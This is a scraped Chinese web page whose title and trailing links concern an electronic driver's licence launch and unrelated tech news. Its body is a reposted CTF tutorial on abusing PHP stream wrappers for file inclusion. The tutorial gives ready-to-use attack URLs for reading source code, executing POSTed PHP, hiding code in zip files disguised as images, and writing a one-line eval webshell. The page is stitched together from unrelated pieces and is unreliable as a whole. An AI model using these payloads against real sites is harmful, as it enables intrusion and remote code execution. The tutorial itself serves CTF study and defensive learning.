2. 程式人生 > 資訊 >電子駕照明天正式上線,實測現已支援領取

電子駕照明天正式上線,實測現已支援領取

阿新 發佈:2021-08-31

本篇總結下一些封裝協議,涉及的相關協議:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data://等

一.【file://協議】

PHP.ini:

file:// 協議在雙off的情況下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

file:// 用於訪問本地檔案系統,在CTF中通常用來讀取本地檔案的且不受allow_url_fopen與allow_url_include的影響

file:// [檔案的絕對路徑和檔名]

http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WWW/phpcode.txt

二.【php://協議】

條件:

不需要開啟allow_url_fopen,僅php://input、 php://stdin、 php://memory 和 php://temp 需要開啟allow_url_include。

php:// 訪問各個輸入/輸出流(I/O streams),在CTF中經常使用的是php://filter和php://input,php://filter用於讀取原始碼,php://input用於執行php程式碼。

參考自:http://php.net/manual/zh/wrappers.php.php#refsect2-wrappers.php-unknown-unknown-unknown-descriptioq

php://filter讀取原始碼並進行base64編碼輸出,不然會直接當做php程式碼執行就看不到原始碼內容了。

PHP.ini:

php://filter在雙off的情況下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

測試現象:

http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php

php://input可以訪問請求的原始資料的只讀流, 將post請求中的資料作為PHP程式碼執行。

PHP.ini:

allow_url_fopen :off/on

allow_url_include:on

測試現象:

http://127.0.0.1/cmd.php?file=php://input

[POST DATA] <?php phpinfo()?>

也可以POST如下內容生成一句話: <?php fputs(fopen(“shell.php”,”w”),’<?php eval($_POST["cmd"];?>’);?>

三.【zip://, bzip2://, zlib://協議】

PHP.ini:

zip://, bzip2://, zlib://協議在雙off的情況下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

zip://, bzip2://, zlib:// 均屬於壓縮流,可以訪問壓縮檔案中的子檔案,更重要的是不需要指定字尾名。

參考自:http://php.net/manual/zh/wrappers.compression.php

1.【zip://協議】

使用方法:

zip://archive.zip#dir/file.txt

zip:// [壓縮檔案絕對路徑]#[壓縮檔案內的子檔名]

測試現象:

http://127.0.0.1/cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt

先將要執行的PHP程式碼寫好檔名為phpcode.txt,將phpcode.txt進行zip壓縮,壓縮檔名為file.zip,如果可以上傳zip檔案便直接上傳,若不能便將file.zip重新命名為file.jpg後在上傳,其他幾種壓縮格式也可以這樣操作。

由於#在get請求中會將後面的引數忽略所以使用get請求時候應進行url編碼為%23,且此處經過測試相對路徑是不可行,所以只能用絕對路徑。

2.【bzip2://協議】

使用方法:

compress.bzip2://file.bz2

測試現象:

http://127.0.0.1/cmd.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg

or

http://127.0.0.1/cmd.php?file=compress.bzip2://./file.jpg

3.【zlib://協議】

使用方法:

compress.zlib://file.gz

測試現象:

http://127.0.0.1/cmd.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg

or

http://127.0.0.1/cmd.php?file=compress.zlib://./file.jpg

四.【data://協議】

經過測試官方文件上存在一處問題,經過測試PHP版本5.2,5.3,5.5,7.0;data:// 協議是是受限於allow_url_fopen的,官方文件上給出的是NO,所以要使用data://協議需要滿足雙on條件

PHP.ini:

data://協議必須雙在on才能正常使用;

allow_url_fopen :on

allow_url_include:on

參考自:http://php.net/manual/zh/wrappers.data.php, 官方文件上allow_url_fopen應為yes。

測試現象:

http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>

or

http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

也可以:

http://127.0.0.1/cmd.php?file=data:text/plain,<?php phpinfo()?>

or

http://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

五. 常規小結:

PHP封裝協議在CTF蠻常見的,是經常會遇到的出題點,如下便是對本篇涉及的封裝協議進行的總結,期待小夥伴的交流和補充。

轉自:https://www.freebuf.com/column/148886.html

相關推薦

電子駕照明天正式上線實測現已支援領取

8 月 31 日訊息公安部決定9 月 1 日起 28 城(發證城市非所在城市領取後全國可用)可申領駕駛證電子版(簡稱“電子駕駛證”)並將在全國範圍內分階段實施2022 年將在全國全面推行。

C6 駕照正式上線已有駕駛員成功拿證能開輕型牽引掛車(房車)

感謝網友 肖戰割割 的線索投遞!

首發丨微信小程式正式上線 首批名單揭曉!

2017 年 1 月 9 日凌晨微信小程式正式上線博卡君熬夜疾書第一時間為小程式開發者和眾多「小程式」迷們展現歷盡一個多月精心收集和統計的微信小程式「第一榜單」。

vivo OriginOS 新春版正式上線目前 vivo 和 iQOO 部分機型已擁有

2 月時值我國農曆春節對於每一箇中國人來說這是一年中最重要的節日喜氣祥和、張燈結綵是春節期間的主旋律。針對於此vivo 全新手機作業系統 OriginOS 正式上線新春版。此次 OriginOS 新春版主打濃厚節日氛圍

位元組跳動遊戲官網正式上線品牌名為 “朝夕光年”旗下包括《鏢人》等遊戲

2 月 22 日訊息位元組跳動遊戲官網近日正式上線主體顯示為 “朝夕光年”英文名為 NVERSEGAME。

革命性超級混動技術:比亞迪秦 PLUS DM-i 車型正式上線10.58 萬元起

3 月 8 日訊息 比亞迪今日為秦 PLUS DM-i 超級混動車型舉辦了上市釋出會宣佈今日下午 3 點 8 分正式上市目前該車型新車補貼後售價區間為 10.58-14.58 萬元提供純電續航 55km 和 120km 兩種版本共包括四款

王者榮耀 S24 賽季 6 月 23 日正式上線新英雄雲纓風火來襲

6 月 22 日訊息 王者榮耀官方宣佈2021 長安賽年王者榮耀 S24 賽季長槍掠火明日震撼上線

中國移動:中國搜尋 5G 訊息正式上線可收發多媒體訊息

7 月 8 日訊息近日中國搜尋 5G 訊息在中國移動商用網路正式上線。通過將搜尋引擎和人工智慧等尖端科技賦能 5G 訊息中國搜尋全面服務媒體融合並帶來全新體驗。

《斬妖行》完整版正式上線全新角色公開!

今日由bilibili遊戲獨家發行的東方誌怪橫版動作遊戲《斬妖行》完整版正式上線啦!在bilibili即可購買遊戲同時也可以在SteamWeGame喜加一。

東京奧運會官方授權手遊正式上線由位元組跳動旗下公司運營

7 月 12 日訊息《索尼克在 2020 東京奧運會》是一款由世嘉開發的東京奧運會唯一官方授權手遊。該手遊於 5 月份宣佈引進國內由位元組跳動旗下朝夕光年運營。

礦視界譯文:Chia礦池正式上線礦工需要注意哪些事情?

7月7日Chia官方正式釋出其礦池協議1.2.0版。該版本標誌著全新的繪圖(plots)格式的出現——所謂的可移植繪圖(portable plots)。

《塞爾達傳說:天空之劍 HD》明日上線評分現已解禁:暫無差評

7 月 15 日訊息《塞爾達傳說:天空之劍 HD》明日正式登陸任天堂 Switch 平臺現已在 eShop 進行預售中遊戲大小 7.7GB 的售價 6578 日元特別定製款的限定 Joy-Con 售價 8778 日元。

小米手機濟南泉城通正式上線可享 0 元開卡(附流程和支援機型)

7 月 22 日訊息天星金融宣佈濟南泉城通已經正式上線不僅如此還有 0 元開卡和出行優惠。

Redmi AirDots 3 Pro 連線 Note 10 Pro 遊戲低延時功能正式上線低至 69ms

7 月 28 日訊息Redmi 官方宣佈Redmi AirDots 3 Pro x Note 10 Pro 的 69ms 遊戲低延時功能正式上線更新韌體後即可使用。

榮耀全球主題曲《Go Beyond》正式上線今晚釋出會搶先體驗

8 月 12 日訊息榮耀最新的全球主題曲《Go Beyond》現已正式上線各位小夥伴可以在 QQ 音樂、網易雲音樂等平臺率先領略其風采。

王者榮耀七夕節面板「王昭君-乞巧織情」正式上線1688 點券

8 月 13 日訊息 據王者榮耀官方微博七夕節面板「王昭君-乞巧織情」在今日正式上線面板品質為“傳說”價格為 1688 點券。

店匠Hero 主題正式上線高度定製化賦能商家實現商業成功

Hero 主題介紹 在跨境電商獨立站中店鋪主題就像是線下門店裝修它在消費者全流程體驗和商家盈利方面都發揮著重要作用。

英雄聯盟雲頂之弈正版授權手遊《金剷剷之戰》今日正式上線代言人陳赫

8 月 26 日訊息 官方現在宣佈英雄聯盟雲頂之弈正版授權手遊《金剷剷之戰》今日正式上線!本次全量上線的《金剷剷之戰》將保留“時空裂痕”版本並同步上線“英雄之黎明”賽季玩法完美復刻了雲頂 S1 以及 S5.

統一推送聯盟:統一推送能力開放平臺正式上線為 UMS 重要組成部分

8 月 26 日訊息 今日統一推送聯盟宣佈統一推送能力開放平臺正式上線開發者招募啟動。

北京市電子學生卡正式推出刷手機乘公交 2.5 折首先支援華為、小米手機

9 月 4 日訊息據北京市政交通一卡通釋出為順應移動支付潮流響應市教委提升對學生群體服務水平的要求北京交通大學作為試點單位率先為符合條件的在校生免費配發集身份識別、乘車優待、市政交通一卡通等多重功